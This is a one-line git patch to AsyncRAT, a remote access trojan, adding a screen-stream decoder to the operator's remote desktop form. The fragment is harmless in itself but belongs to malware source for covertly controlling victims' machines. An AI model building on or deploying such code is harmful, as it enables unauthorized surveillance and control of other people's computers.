From 8352f23389e4846c3a889a2bcd84f837a19cd61c Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Sat, 9 Feb 2019 00:01:17 -0800 Subject: [PATCH] Update RemoteDesktop.cs --- AsyncRAT-C#/AsyncRAT-Sharp/Forms/RemoteDesktop.cs | 1 + 1 file changed, 1 insertion(+) diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/RemoteDesktop.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/RemoteDesktop.cs index fc621f4..678cada 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/RemoteDesktop.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/RemoteDesktop.cs @@ -47,6 +47,7 @@ namespace AsyncRAT_Sharp.Forms msgpack.ForcePathObject("Packet").AsString = "remoteDesktop"; msgpack.ForcePathObject("Option").AsString = "true"; C.BeginSend(msgpack.Encode2Bytes()); + decoder = new UnsafeStreamCodec(80); } }